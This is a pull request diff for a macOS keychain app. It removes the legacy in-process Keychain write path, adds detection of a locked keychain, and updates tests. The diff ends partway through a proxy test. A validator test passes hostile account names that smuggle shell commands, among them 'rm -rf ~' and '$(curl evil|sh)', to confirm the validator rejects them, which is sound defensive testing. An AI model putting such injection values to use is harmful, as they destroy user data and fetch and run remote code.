### PR TITLE
feat(core): C3 — 旧 in-process 書込経路の削除 + ロック即時検出 (#170)

### DIFF
--- a/AIkeychain/Services/KeyShareService.swift
+++ b/AIkeychain/Services/KeyShareService.swift
@@ -12,6 +12,13 @@ import Security
 /// 掴ませる（credential substitution）ことが可能。これを防ぐため送信者の
 /// 署名鍵で正規メッセージに署名し、受信者はフィンガープリントを帯域外で
 /// 照合する（有効な署名 ≠ 信頼できる送信者。UI がこの照合を強制する）。
+///
+/// ## Keychain アクセス経路について（#167/#170）
+/// ここで扱う共有秘密鍵・署名鍵は**アプリ内部鍵**であり、ユーザーの API シークレット
+/// とは別物。`akc`/CLI から読む対象ではないため、「書込は subprocess `/usr/bin/security`」
+/// という #167 の単一作成アイデンティティ原則の**意図的な例外**として in-process
+/// SecItem* を使い続ける — アプリ自身だけが無音で読める in-proc 所有がむしろ正しい
+/// （security 所有にするとアプリの読取が ~7 秒ブロック + SecurityAgent 起動になる, E6-1）。
 enum KeyShareService {
 
     private static let privateKeyTag = "com.aieo.aikeychain.sharekey"

--- a/AIkeychain/Services/KeyShareService.swift
+++ b/AIkeychain/Services/KeyShareService.swift
@@ -21,6 +21,10 @@ import Security
 /// （security 所有にするとアプリの読取が ~7 秒ブロック + SecurityAgent 起動になる, E6-1）。
 enum KeyShareService {
 
+    // アプリ予約の service 名（#183 レビュー D-Q1）: ユーザーキー名は
+    // EnvVarName.isValid がドットを禁止するため、manual スキーム (service=キー名) が
+    // この 2 つと衝突することは構造的に不可能。managed/旧 GUI service とも別文字列。
+    // saveRawKey の delete→add はこの予約を前提に無条件で行う。
     private static let privateKeyTag = "com.aieo.aikeychain.sharekey"
     private static let signKeyTag = "com.aieo.aikeychain.signkey"
 

--- a/AIkeychain/Services/KeychainService.swift
+++ b/AIkeychain/Services/KeychainService.swift
@@ -30,14 +30,15 @@ protocol KeychainServiceProtocol {
     func retrieveNoninteractive(for account: String) throws -> String?
     func delete(for account: String) throws
     func exists(for account: String) -> Bool
-    /// AI KeyChain の保存 service (com.aieo.aikeychain) に存在する全アカウント名を列挙する。
-    /// CLI (`akc set`) で追加され GUI 索引に無いキーを発見するために使う (#153)。
-    /// 秘密値は読まない（アカウント名のみ）。
+    /// 主ストア（managed namespace, com.aieo.aikeychain.managed / #167）に存在する
+    /// 全アカウント名を列挙する。CLI (`akc set`) で追加され GUI 索引に無いキーを
+    /// 発見するために使う (#153)。秘密値は読まない（アカウント名のみ）。
     func allAccounts() -> [String]
-    /// manual スキーム (service=<キー名>) で保存されているキー名を列挙する (#160)。
-    /// `security add-generic-password -s KEY_NAME` による手動登録や、既存 manual
-    /// エントリを `akc set` が更新した場合のアイテムが対象。npm CLI の判定規則と同じく
-    /// env 変数名形式の service のみを manual と見なす。秘密値は読まない。
+    /// レガシー manual スキーム (service=<キー名>) で保存されているキー名を列挙する
+    /// (#160)。`security add-generic-password -s KEY_NAME` による手動登録アイテムが
+    /// 対象（#179 以降、akc set の書込先は managed であり manual には書かない）。
+    /// npm CLI の判定規則と同じく env 変数名形式の service のみを manual と見なす。
+    /// 秘密値は読まない。C5 (#172) の移行完了とともに廃止予定。
     func manualServices() -> [String]
 }
 

--- a/AIkeychain/Services/KeychainService.swift
+++ b/AIkeychain/Services/KeychainService.swift
@@ -1,6 +1,4 @@
 import Foundation
-import Security
-import LocalAuthentication
 
 enum KeychainError: LocalizedError {
     case duplicateItem
@@ -8,11 +6,6 @@ enum KeychainError: LocalizedError {
     case invalidData
     case invalidAccount
     case interactionRequired
-    /// The item is owned by `/usr/bin/security` (registered via the `akc` CLI or a
-    /// manual `security add-generic-password`). An in-process edit from the GUI would
-    /// silently poison it — leaving `akc run` unable to read it — so we fail closed
-    /// and tell the user to edit it via the CLI instead. See issue #177.
-    case cliManaged(String)
     case unexpectedStatus(OSStatus)
 
     var errorDescription: String? {
@@ -22,7 +15,6 @@ enum KeychainError: LocalizedError {
         case .invalidData: "Failed to encode/decode the key data."
         case .invalidAccount: "Invalid key name. Use only letters, digits and underscores (must start with a letter or underscore)."
         case .interactionRequired: "Keychain access requires user interaction (consent or unlock), which is unavailable in this context."
-        case .cliManaged(let account): "\(account) is managed by the akc CLI. Change its value from the terminal with: akc set \(account)"
         case .unexpectedStatus(let status): "Keychain error: \(status)"
         }
     }
@@ -49,247 +41,12 @@ protocol KeychainServiceProtocol {
     func manualServices() -> [String]
 }
 
-final class KeychainService: KeychainServiceProtocol {
-    static let shared = KeychainService()
-
-    private let service = "com.aieo.aikeychain"
-
-    private init() {}
-
-    private func baseQuery(for account: String) -> [String: Any] {
-        [
-            kSecClass as String: kSecClassGenericPassword,
-            kSecAttrService as String: service,
-            kSecAttrAccount as String: account,
-        ]
-    }
-
-    /// manual スキーム (service=<キー名>) のクエリ。acct はゆらぎがある（$USER /
-    /// キー名 / 空）ため意図的にピン留めしない — #91 の CLI 側 2 段ルックアップと同じ。
-    private func manualQuery(for account: String) -> [String: Any] {
-        [
-            kSecClass as String: kSecClassGenericPassword,
-            kSecAttrService as String: account,
-        ]
-    }
-
-    /// アイテムの存在を **値を読まずに** 確認する（データも属性も返さない）。
-    /// 値読み取り (kSecReturnData) は security 所有アイテムで ~7 秒ブロックして
-    /// SecurityAgent を起動する（#177 の実測 E6-1）が、存在照会はプロンプト無しで
-    /// 安全（exists(for:) と同じ）。
-    private func itemExists(matching base: [String: Any]) throws -> Bool {
-        var query = base
-        query[kSecMatchLimit as String] = kSecMatchLimitOne
-        let status = SecItemCopyMatching(query as CFDictionary, nil)
-        switch status {
-        case errSecSuccess: return true
-        case errSecItemNotFound: return false
-        default: throw KeychainError.unexpectedStatus(status)
-        }
-    }
-
-    func save(value: String, for account: String) throws {
-        // シンクでの一元検証: どの ingress（手動エディタ / .env インポート /
-        // キー共有インポート）経由でも、シェル export に安全な名前だけを Keychain に
-        // 書き込む。共有ファイル等の外部由来 envVarName によるシェルインジェクション
-        // （ZshrcExporter が `export \(name)=...` へ生値補間）を根本で防ぐ (#116)。
-        guard EnvVarName.isValid(account) else {
-            throw KeychainError.invalidAccount
-        }
-        guard let data = value.data(using: .utf8) else {
-            throw KeychainError.invalidData
-        }
-
-        // #177: 既存アイテムへの in-process SecItemUpdate は、そのアイテムが
-        // /usr/bin/security 所有（`akc set` / 手動 security 登録）の場合、**無音で成功
-        // するのに所有権を毒化し、以後 `akc run` がヘッドレスで読めなくなる**（実測 E6-4）。
-        // よって update を使わず、SecItemDelete を「所有権プローブ」として使う:
-        // 削除に失敗（-25244 = security 所有、または UIFail による -25308 = 要対話）なら
-        // in-process 編集は毒化する／できないので **アイテムを変更せず fail-closed**
-        // （`akc set` で編集するよう案内）。削除成功 = GUI 所有 → 新しい値で再作成する。
-        //
-        // 既知の限界（いずれも恒久対応は #167 の v2 namespace / security 経路書込）:
-        //  1. delete→add は原子的でない。GUI 所有アイテムで delete 成功直後に add が
-        //     （キーチェーンのロック等で）失敗すると旧値を失う窓がある。add を 1 回
-        //     リトライして緩和し、それでも失敗したら旧値の消失を隠さず throw する。
-        //  2. `security add -A`（allow-all-apps ACL）で作られたキーは GUI からの
-        //     SecItemDelete が成功してしまい、GUI 所有として再作成され所有権が再毒化
-        //     し得る（akc set のデフォルト ACL では発生しない稀ケース）。
-        //  3. save() はメインスレッドで呼ばれる。SecItemDelete は E6-3 で security 所有
-        //     アイテムに対し即座に -25244（プロンプト無し）を返すことを実測済みで、
-        //     さらに下記 UIFail で対話を明示禁止するため UI フリーズは起きない。
-        let appQuery = baseQuery(for: account)
-
-        if try itemExists(matching: appQuery) {
-            var deleteQuery = appQuery
-            // 削除がプロンプト/フリーズしないよう UI を明示禁止（旧 ad-hoc 署名などの
-            // 別 partition アイテムでも SecurityAgent を起動させず即座に失敗させる）。
-            // deprecation 警告が出るが、推奨代替の LAContext.interactionNotAllowed は
-            // **Keychain の partition/パスワードプロンプトを抑止しない**ことを実測済み
-            // （#177 の E6-1。生体認証系 UI 専用）。よって意図的に kSecUseAuthenticationUIFail
-            // を使う。
-            deleteQuery[kSecUseAuthenticationUI as String] = kSecUseAuthenticationUIFail
-            let deleteStatus = SecItemDelete(deleteQuery as CFDictionary)
-            switch deleteStatus {
-            case errSecSuccess, errSecItemNotFound:
-                break // GUI 所有 → 下で再作成
-            case errSecInteractionNotAllowed, errSecAuthFailed, -25244:
-                // security 所有 / 要対話 = in-process 編集不可 → 毒化させず fail-closed。
-                throw KeychainError.cliManaged(account)
-            default:
-                // ロック等の想定外失敗も、アイテムは未変更なので安全側に倒す。
-                throw KeychainError.unexpectedStatus(deleteStatus)
-            }
-        } else if EnvVarName.isManualSchemeCandidate(account),
-                  try itemExists(matching: manualQuery(for: account)) {
-            // manual スキーム (service=<KEY>) のキーは実運用上ほぼ security 所有
-            // （手動 security 登録 / `akc set` の manual 更新）。in-process 編集は毒化する
-            // ため、削除を試みず fail-closed（#163 の manual in-place 更新を置き換える）。
-            throw KeychainError.cliManaged(account)
-        }
-
-        // 新規キー、または GUI 所有アイテムの削除成功後 → GUI スキームに追加
-        var addQuery = appQuery
-        addQuery[kSecValueData as String] = data
-        addQuery[kSecAttrAccessible as String] = kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
-
-        var addStatus = SecItemAdd(addQuery as CFDictionary, nil)
-        if addStatus != errSecSuccess {
-            // delete 後の add 失敗（旧値消失の窓）を緩和するため 1 回だけ再試行。
-            addStatus = SecItemAdd(addQuery as CFDictionary, nil)
-        }
-        guard addStatus == errSecSuccess else {
-            throw KeychainError.unexpectedStatus(addStatus)
-        }
-    }
-
-    func retrieve(for account: String) throws -> String? {
-        // 2 段ルックアップ: GUI スキーム → manual スキーム (#91 の CLI 側と同じ順序 / #160)。
-        // manual 側は厳格な名前形（大文字スネークケース）のときだけ照会し、
-        // 他アプリ/システムのアイテムへ fallback が波及しないようにする。
-        if let value = try copyValue(query: baseQuery(for: account)) {
-            return value
-        }
-        guard EnvVarName.isManualSchemeCandidate(account) else { return nil }
-        return try copyValue(query: manualQuery(for: account))
-    }
-
-    private func copyValue(query base: [String: Any], context: LAContext? = nil) throws -> String? {
-        var query = base
-        query[kSecReturnData as String] = true
-        query[kSecMatchLimit as String] = kSecMatchLimitOne
-        if let context {
-            query[kSecUseAuthenticationContext as String] = context
-        }
-
-        var result: AnyObject?
-        let status = SecItemCopyMatching(query as CFDictionary, &result)
-
-        if status == errSecItemNotFound {
-            return nil
-        }
-        if status == errSecInteractionNotAllowed {
-            throw KeychainError.interactionRequired
-        }
-
-        guard status == errSecSuccess else {
-            throw KeychainError.unexpectedStatus(status)
-        }
-
-        guard let data = result as? Data, let string = String(data: data, encoding: .utf8) else {
-            throw KeychainError.invalidData
-        }
-
-        return string
-    }
-
-    func retrieveNoninteractive(for account: String) throws -> String? {
-        // Fail fast instead of presenting (and blocking on) a consent/auth prompt.
-        let context = LAContext()
-        context.interactionNotAllowed = true
-        if let value = try copyValue(query: baseQuery(for: account), context: context) {
-            return value
-        }
-        guard EnvVarName.isManualSchemeCandidate(account) else { return nil }
-        return try copyValue(query: manualQuery(for: account), context: context)
-    }
-
-    func delete(for account: String) throws {
-        // GUI スキームと manual スキームの両方を削除する（`akc delete` と同じ意味論）。
-        // 片方だけ消すと 2 段ルックアップ (retrieve) がもう片方を解決し続け、
-        // 「削除したのに残っている」状態になるため (#160)。manual 側は他ツール作成の
-        // アイテムであり得るため、削除確認ダイアログ（KeyEditorView）が manual コピーの
-        // 存在を事前警告する。
-        // 順序は manual → GUI: 逆順だと manual 削除が失敗したとき GUI コピーだけが
-        // 消え、古い manual 値が 2 段ルックアップで「復活」する（fail-closed 化）。
-        // SecItemDelete は macOS では全一致アイテムを削除する。
-        if EnvVarName.isManualSchemeCandidate(account) {
-            let manualStatus = SecItemDelete(manualQuery(for: account) as CFDictionary)
-            guard manualStatus == errSecSuccess || manualStatus == errSecItemNotFound else {
-                throw KeychainError.unexpectedStatus(manualStatus)
-            }
-        }
-        let guiStatus = SecItemDelete(baseQuery(for: account) as CFDictionary)
-        guard guiStatus == errSecSuccess || guiStatus == errSecItemNotFound else {
-            throw KeychainError.unexpectedStatus(guiStatus)
-        }
-    }
-
-    func exists(for account: String) -> Bool {
-        // 2 段ルックアップ (#160)。attributes 照会のみで値は読まないため承認 UI は出ない。
-        var queries = [baseQuery(for: account)]
-        if EnvVarName.isManualSchemeCandidate(account) {
-            queries.append(manualQuery(for: account))
-        }
-        for base in queries {
-            var query = base
-            query[kSecMatchLimit as String] = kSecMatchLimitOne
-            if SecItemCopyMatching(query as CFDictionary, nil) == errSecSuccess {
-                return true
-            }
-        }
-        return false
-    }
-
-    func allAccounts() -> [String] {
-        let query: [String: Any] = [
-            kSecClass as String: kSecClassGenericPassword,
-            kSecAttrService as String: service,
-            kSecMatchLimit as String: kSecMatchLimitAll,
-            kSecReturnAttributes as String: true,
-        ]
-        var result: AnyObject?
-        let status = SecItemCopyMatching(query as CFDictionary, &result)
-        guard status == errSecSuccess, let items = result as? [[String: Any]] else {
-            return []
-        }
-        return items.compactMap { $0[kSecAttrAccount as String] as? String }
-    }
-
-    func manualServices() -> [String] {
-        // service 指定なしで全 generic password の attributes を列挙し（値は読まないため
-        // 承認 UI は出ない）、env 変数名形式の service を manual スキームと判定する。
-        // npm CLI (cli/src/keychain.js) の dump-keychain 解析と同じ規則 (#160)。
-        let query: [String: Any] = [
-            kSecClass as String: kSecClassGenericPassword,
-            kSecMatchLimit as String: kSecMatchLimitAll,
-            kSecReturnAttributes as String: true,
-        ]
-        var result: AnyObject?
-        let status = SecItemCopyMatching(query as CFDictionary, &result)
-        guard status == errSecSuccess, let items = result as? [[String: Any]] else {
-            return []
-        }
-        var seen = Set<String>()
-        return items.compactMap { item -> String? in
-            guard let svc = item[kSecAttrService as String] as? String,
-                  svc != service,
-                  EnvVarName.isManualSchemeCandidate(svc),
-                  seen.insert(svc).inserted else { return nil }
-            return svc
-        }
-    }
-}
+// NOTE: 旧 in-process 実装 (`final class KeychainService`) は C3 #170 で削除した。
+// GUI の secret 読み書きは SecurityCLIKeychainService（subprocess /usr/bin/security・
+// managed namespace）が唯一の経路。in-proc SecItem* を secret 値に使ってはならない
+// （PartitionID が分かれて akc run のヘッドレス読取を壊す — #167 の設計原理）。
+// アプリ内部鍵（共有/署名鍵、KeyShareService）は例外: akc が読む対象ではなく、
+// アプリだけが無音で読める in-proc 所有が正しい。
 
 // MARK: - Mock for Previews and Tests
 
@@ -297,21 +54,8 @@ final class MockKeychainService: KeychainServiceProtocol {
     var store: [String: String] = [:]
     /// manual スキーム (service=<キー名>) 相当のアイテム (#160)
     var manualStore: [String: String] = [:]
-    /// `/usr/bin/security` 所有（`akc set` / 手動登録）を模すアカウント。実装では
-    /// in-process SecItemDelete が -25244 で失敗するケース。save() は fail-closed する (#177)。
-    var securityOwnedAccounts: Set<String> = []
 
     func save(value: String, for account: String) throws {
-        // #177: 実装と同じ fail-closed 契約。
-        // (1) security 所有アイテム（app スキームだが CLI/手動作成）→ in-process 編集は
-        //     毒化するため cliManaged で拒否。
-        // (2) manual スキームにのみ存在するキーも実運用上 security 所有 → 拒否。
-        if securityOwnedAccounts.contains(account) {
-            throw KeychainError.cliManaged(account)
-        }
-        if store[account] == nil, manualStore[account] != nil {
-            throw KeychainError.cliManaged(account)
-        }
         store[account] = value
     }
 

--- a/AIkeychain/Services/SecurityCLIKeychainService.swift
+++ b/AIkeychain/Services/SecurityCLIKeychainService.swift
@@ -67,7 +67,9 @@ final class SecurityCLIKeychainService: KeychainServiceProtocol {
     // MARK: - KeychainServiceProtocol
 
     func save(value: String, for account: String) throws {
-        try ensureKeychainUnlocked()
+        // 純粋な入力検証はロック判定より先に行う: 外部状態（ロック）で不正入力の
+        // エラー種別が interactionRequired に化けると、呼び出し側の
+        // unsupported/failed 分類が解錠の前後で変わってしまう（#183 レビュー SF-2）
         guard EnvVarName.isValid(account) else {
             throw KeychainError.invalidAccount
         }
@@ -86,6 +88,7 @@ final class SecurityCLIKeychainService: KeychainServiceProtocol {
         guard value.count <= Self.maxValueLength else {
             throw KeychainError.invalidData
         }
+        try ensureKeychainUnlocked()
 
         let hex = value.data(using: .utf8)!.map { String(format: "%02x", $0) }.joined()
         // -U: 既存アイテムの更新。security 所有アイテムへの -U は所有権・headless

--- a/AIkeychain/Services/SecurityCLIKeychainService.swift
+++ b/AIkeychain/Services/SecurityCLIKeychainService.swift
@@ -43,6 +43,9 @@ final class SecurityCLIKeychainService: KeychainServiceProtocol {
     /// 環境変数ではなくコード（@testable）からのみ変更できる internal プロパティにする。
     var securityBinOverrideForTesting: String?
 
+    /// テスト専用: ロック検出の差し替え口（実 Keychain の状態に依存させない）。
+    var keychainLockedProbeForTesting: (() -> Bool)?
+
     private var effectiveSecurityBin: String { securityBinOverrideForTesting ?? securityBin }
 
     // MARK: - 直列化・coalescing・quarantine (#169 Proxy ハードニング)
@@ -64,6 +67,7 @@ final class SecurityCLIKeychainService: KeychainServiceProtocol {
     // MARK: - KeychainServiceProtocol
 
     func save(value: String, for account: String) throws {
+        try ensureKeychainUnlocked()
         guard EnvVarName.isValid(account) else {
             throw KeychainError.invalidAccount
         }
@@ -106,10 +110,14 @@ final class SecurityCLIKeychainService: KeychainServiceProtocol {
     }
 
     func retrieve(for account: String) throws -> String? {
-        try subprocessRead(account: account, timeout: writeTimeout)
+        try ensureKeychainUnlocked()
+        return try subprocessRead(account: account, timeout: writeTimeout)
     }
 
     func retrieveNoninteractive(for account: String) throws -> String? {
+        // ロック中は spawn せず即時失敗（quarantine より前 — ロックはキー単位の
+        // 状態ではないので、解錠後まで 60 秒隔離を残さない）
+        try ensureKeychainUnlocked()
         // Proxy 経路: quarantine 済みキーは spawn せず即時失敗（fail fast）
         stateLock.lock()
         if let until = quarantinedUntil[account], until > Date() {
@@ -155,6 +163,7 @@ final class SecurityCLIKeychainService: KeychainServiceProtocol {
     }
 
     func delete(for account: String) throws {
+        try ensureKeychainUnlocked()
         // 掃除の順序が要（#179 二段レビュー B3）: fallback ストア（manual → 旧 GUI）を
         // **先に**消し、権威コピー（managed）を最後に消す。逆順で legacy 掃除が失敗すると
         // 「削除成功と報告したのに `akc get` の fallback が古い値を解決し続ける」状態になる。
@@ -271,6 +280,31 @@ final class SecurityCLIKeychainService: KeychainServiceProtocol {
                   EnvVarName.isManualSchemeCandidate(svc),
                   seen.insert(svc).inserted else { return nil }
             return svc
+        }
+    }
+
+    // MARK: - ロック検出 (#170: #169 チェックリストの残)
+
+    /// default keychain がロックされているか。ロック中の subprocess `security` は
+    /// SecurityAgent の解錠ダイアログでブロックし timeout-kill 行きになるため、
+    /// spawn 前に検出して UI を出さず即時失敗させる（Proxy は 503 に写像される）。
+    /// SecKeychain* API は deprecated だがロック状態を無音で読める代替が無い。
+    private func isDefaultKeychainLocked() -> Bool {
+        if let probe = keychainLockedProbeForTesting { return probe() }
+        var keychain: SecKeychain?
+        guard SecKeychainCopyDefault(&keychain) == errSecSuccess, let keychain else {
+            return false // 判定不能はブロックしない（従来挙動 = timeout に委ねる）
+        }
+        var status = SecKeychainStatus(0)
+        guard SecKeychainGetStatus(keychain, &status) == errSecSuccess else { return false }
+        return (status & SecKeychainStatus(kSecUnlockStateStatus)) == 0
+    }
+
+    /// ロック中は interactionRequired を即時 throw する。quarantine はしない
+    /// （ロックはキー単位でなく全体の状態で、解錠後に 60 秒待たせる理由が無い）。
+    private func ensureKeychainUnlocked() throws {
+        if isDefaultKeychainLocked() {
+            throw KeychainError.interactionRequired
         }
     }
 

--- a/AIkeychain/ViewModels/KeyListViewModel.swift
+++ b/AIkeychain/ViewModels/KeyListViewModel.swift
@@ -122,11 +122,13 @@ final class KeyListViewModel {
         }
 
         // manual スキーム (service=<キー名>) のキーも同様に発見する (#160)。
-        // `security add-generic-password -s KEY_NAME` による手動登録や、既存 manual
-        // エントリを `akc set` が更新した場合はこちらにしか存在しない。値の解決は
-        // KeychainService の 2 段ルックアップ (GUI → manual) が引き受けるため、
-        // GUI からは他の発見キーと同じに扱える。名前は厳格形（大文字スネークケース）
-        // のみ採用 — 緩くすると iCloud 等のシステムアイテムを誤検出する。
+        // `security add-generic-password -s KEY_NAME` による手動登録のアイテムが対象。
+        // 値の解決は akc の 3 段ルックアップ (managed → 旧GUI → manual) が引き受ける。
+        // GUI の値読取（SecurityCLIKeychainService）は managed のみを見るため、
+        // manual キーの値はエディタでは空になる — C5 (#172) 移行アシスタントで
+        // managed へ移行するまでの過渡状態（akc run では従来どおり解決可能）。
+        // 名前は厳格形（大文字スネークケース）のみ採用 — 緩くすると iCloud 等の
+        // システムアイテムを誤検出する。
         for svc in keychainService.manualServices()
         where EnvVarName.isManualSchemeCandidate(svc) && known.insert(svc).inserted {
             let discovered = CustomKey(

--- a/AIkeychain/Views/ShareKeysView.swift
+++ b/AIkeychain/Views/ShareKeysView.swift
@@ -952,7 +952,7 @@ private struct ReceiveTab: View {
         var failed: [String] = []
         for entry in entries {
             // 外部由来の .aikeychain ファイルの envVarName は信頼できない。
-            // シェル export に不正な名前はスキップする（KeychainService.save 側でも
+            // シェル export に不正な名前はスキップする（SecurityCLIKeychainService.save 側でも
             // 弾かれるが、ここで明示的に skip して意図を明確化 / #116）。
             guard EnvVarName.isValid(entry.envVarName) else { continue }
             do {

--- a/AIkeychain/Views/ShareKeysView.swift
+++ b/AIkeychain/Views/ShareKeysView.swift
@@ -539,7 +539,7 @@ private struct ReceiveTab: View {
     @State private var overwriteConfirmed = false          // 既存上書きの明示承諾
     @State private var imported = false
     @State private var importCount = 0
-    /// #177: 受信キーのうちローカルが akc CLI 管理で上書きできなかった件数。
+    /// 受信キーのうち値形式が未対応（非 ASCII / 複数行 / 8KB 超）で保存できなかった件数。
     @State private var unsupportedCount = 0
     /// 値形式以外の理由（keychain ロック等）で保存できなかった件数。
     @State private var failedCount = 0

--- a/Tests/AIkeychainTests/KeychainServiceTests.swift
+++ b/Tests/AIkeychainTests/KeychainServiceTests.swift
@@ -50,12 +50,4 @@ struct KeychainServiceTests {
         #expect(result == "new")
     }
 
-    @Test("Save overwrites for both new and existing keys")
-    func newAndExistingStillSave() throws {
-        let service = MockKeychainService()
-        try service.save(value: "v1", for: "GITHUB_TOKEN")
-        #expect(try service.retrieve(for: "GITHUB_TOKEN") == "v1")
-        try service.save(value: "v2", for: "GITHUB_TOKEN")
-        #expect(try service.retrieve(for: "GITHUB_TOKEN") == "v2")
-    }
 }

--- a/Tests/AIkeychainTests/KeychainServiceTests.swift
+++ b/Tests/AIkeychainTests/KeychainServiceTests.swift
@@ -50,35 +50,11 @@ struct KeychainServiceTests {
         #expect(result == "new")
     }
 
-    // MARK: - #177: 毒化防止（fail-closed）
-
-    @Test("Editing a CLI/security-owned key fails closed instead of poisoning (#177)")
-    func securityOwnedEditFailsClosed() throws {
+    @Test("Save overwrites for both new and existing keys")
+    func newAndExistingStillSave() throws {
         let service = MockKeychainService()
-        // `akc set` 等で作られ security 所有になっているキーを模す。
-        service.store["OPENAI_API_KEY"] = "sk-original"
-        service.securityOwnedAccounts.insert("OPENAI_API_KEY")
-
-        #expect(throws: KeychainError.self) {
-            try service.save(value: "sk-overwritten", for: "OPENAI_API_KEY")
-        }
-        // 値は未変更（in-process 編集による毒化が起きない）
-        #expect(service.store["OPENAI_API_KEY"] == "sk-original")
-    }
-
-    @Test("cliManaged error tells the user to use `akc set <KEY>` (#177)")
-    func cliManagedErrorMessage() {
-        let message = KeychainError.cliManaged("OPENAI_API_KEY").errorDescription ?? ""
-        #expect(message.contains("akc set OPENAI_API_KEY"))
-    }
-
-    @Test("A brand-new key and a GUI-owned key still save normally (#177 no regression)")
-    func newAndGuiOwnedStillSave() throws {
-        let service = MockKeychainService()
-        // 新規
         try service.save(value: "v1", for: "GITHUB_TOKEN")
         #expect(try service.retrieve(for: "GITHUB_TOKEN") == "v1")
-        // GUI 所有（securityOwned でない）→ 上書き可
         try service.save(value: "v2", for: "GITHUB_TOKEN")
         #expect(try service.retrieve(for: "GITHUB_TOKEN") == "v2")
     }

--- a/Tests/AIkeychainTests/ModelTests.swift
+++ b/Tests/AIkeychainTests/ModelTests.swift
@@ -413,21 +413,26 @@ struct EnvVarNameTests {
     }
 }
 
-@Suite("KeychainService sink validation Tests (#116)")
+@Suite("Keychain sink validation Tests (#116)")
 struct KeychainServiceSinkValidationTests {
 
     @Test("save rejects an invalid account name before touching the Keychain")
     func saveRejectsInvalidAccount() {
-        // ガードは SecItem 呼び出し前に throw するため、実 Keychain に触れずに検証できる。
+        // ガードは subprocess 起動前に throw するため、実 Keychain に触れずに検証できる。
         // 外部由来（共有ファイル等）の不正な名前がどの ingress からでも書き込まれないこと。
+        // security バイナリを存在しないパスに差し替え、万一ガードを素通りしたら
+        // failedToLaunch 系で確実に落ちる（実 keychain 汚染ゼロ）ようにする。
+        let service = SecurityCLIKeychainService()
+        service.securityBinOverrideForTesting = "/nonexistent/security-test-stub"
+        service.keychainLockedProbeForTesting = { false }
         #expect(throws: KeychainError.self) {
-            try KeychainService.shared.save(value: "x", for: "EVIL\"; rm -rf ~; #")
+            try service.save(value: "x", for: "EVIL\"; rm -rf ~; #")
         }
         #expect(throws: KeychainError.self) {
-            try KeychainService.shared.save(value: "x", for: "has space")
+            try service.save(value: "x", for: "has space")
         }
         #expect(throws: KeychainError.self) {
-            try KeychainService.shared.save(value: "x", for: "X=x $(curl evil|sh)")
+            try service.save(value: "x", for: "X=x $(curl evil|sh)")
         }
     }
 }

--- a/Tests/AIkeychainTests/ModelTests.swift
+++ b/Tests/AIkeychainTests/ModelTests.swift
@@ -425,15 +425,17 @@ struct KeychainServiceSinkValidationTests {
         let service = SecurityCLIKeychainService()
         service.securityBinOverrideForTesting = "/nonexistent/security-test-stub"
         service.keychainLockedProbeForTesting = { false }
-        #expect(throws: KeychainError.self) {
-            try service.save(value: "x", for: "EVIL\"; rm -rf ~; #")
+        // invalidAccount をケース一致で検証する: 型だけだと、ガードが消えて
+        // subprocess 起動失敗 (unexpectedStatus) に落ちても緑になってしまい、
+        // このテストが守るはずの回帰を検出できない（#183 レビュー SF-6）。
+        func expectInvalidAccount(_ name: String) {
+            do { try service.save(value: "x", for: name); Issue.record("expected invalidAccount for \(name)") }
+            catch KeychainError.invalidAccount {}
+            catch { Issue.record("expected invalidAccount for \(name), got \(error)") }
         }
-        #expect(throws: KeychainError.self) {
-            try service.save(value: "x", for: "has space")
-        }
-        #expect(throws: KeychainError.self) {
-            try service.save(value: "x", for: "X=x $(curl evil|sh)")
-        }
+        expectInvalidAccount("EVIL\"; rm -rf ~; #")
+        expectInvalidAccount("has space")
+        expectInvalidAccount("X=x $(curl evil|sh)")
     }
 }
 

--- a/Tests/AIkeychainTests/ProxyTests.swift
+++ b/Tests/AIkeychainTests/ProxyTests.swift
@@ -463,15 +463,17 @@ struct ProxyStreamingTests {
     func responseIsStreamed() throws {
         let upstreamPort = port()
         let proxyPort = port()
-        // Upstream sends headers + first SSE event immediately, then waits 4s
+        // Upstream sends headers + first SSE event immediately, then waits 8s
         // before the second event and close. A buffering proxy would deliver
-        // nothing until ~4s; a streaming proxy delivers event 1 right away.
-        // (ギャップと観測窓は並列テストの CPU 混雑でも誤判定しない幅を取る)
+        // nothing until ~8s; a streaming proxy delivers event 1 right away.
+        // (ギャップと観測窓は並列テスト時のスレッドプール枯渇でも誤判定しない幅を
+        //  取る — 窓は wall-clock なので、テストバイナリのスケジューリング次第で
+        //  数秒単位の遅延が観測された)
         let upstream = try FakeUpstream(port: upstreamPort) { conn, queue in
             conn.receive(minimumIncompleteLength: 1, maximumLength: 65536) { _, _, _, _ in
                 let head = "HTTP/1.1 200 OK\r\nContent-Type: text/event-stream\r\n\r\ndata: 1\n\n"
                 conn.send(content: Data(head.utf8), completion: .contentProcessed { _ in
-                    queue.asyncAfter(deadline: .now() + 4.0) {
+                    queue.asyncAfter(deadline: .now() + 8.0) {
                         conn.send(content: Data("data: 2\n\n".utf8), completion: .contentProcessed { _ in
                             conn.cancel()
                         })
@@ -493,14 +495,14 @@ struct ProxyStreamingTests {
         defer { client.disconnect() }
         client.send("GET /v1/models HTTP/1.1\r\nHost: api.anthropic.com\r\n\(ProxyServer.tokenHeaderName): \(server.sessionToken)\r\n\r\n")
 
-        // Well before the upstream's 4s gap, we must already have the status
+        // Well before the upstream's 8s gap, we must already have the status
         // line and the first event — proof of streaming. Loop small recvs until
         // the first event arrives: a single recv returns one TCP segment's worth
         // and can miss data under parallel-test CPU load (flake observed on
-        // unmodified code too). The 3s deadline still cannot observe "data: 2",
-        // which is sent no earlier than 4s after the head.
+        // unmodified code too). The 6s deadline still cannot observe "data: 2",
+        // which is sent no earlier than 8s after the head.
         var early = Data()
-        let earlyDeadline = Date().addingTimeInterval(3.0)
+        let earlyDeadline = Date().addingTimeInterval(6.0)
         while Date() < earlyDeadline {
             early.append(client.recv(timeout: 0.2))
             if (String(data: early, encoding: .utf8) ?? "").contains("data: 1") { break }
@@ -510,9 +512,9 @@ struct ProxyStreamingTests {
         #expect(earlyStr.contains("data: 1"))
         #expect(!earlyStr.contains("data: 2")) // second event hasn't been sent yet
 
-        // Drain the rest (2 個目のイベントは head 送信の 4s 後 — 混雑を見込んで待つ).
+        // Drain the rest (2 個目のイベントは head 送信の 8s 後 — 混雑を見込んで待つ).
         var rest = Data()
-        let drainDeadline = Date().addingTimeInterval(10)
+        let drainDeadline = Date().addingTimeInterval(15)
         while Date() < drainDeadline {
             rest.append(client.recv(timeout: 2))
             if (String(data: rest, encoding: .utf8) ?? "").contains("data: 2") { break }
@@ -563,11 +565,12 @@ struct ProxyStreamingTests {
         Thread.sleep(forTimeInterval: 0.3)
         client.send(String(repeating: "x", count: bodyLen))
 
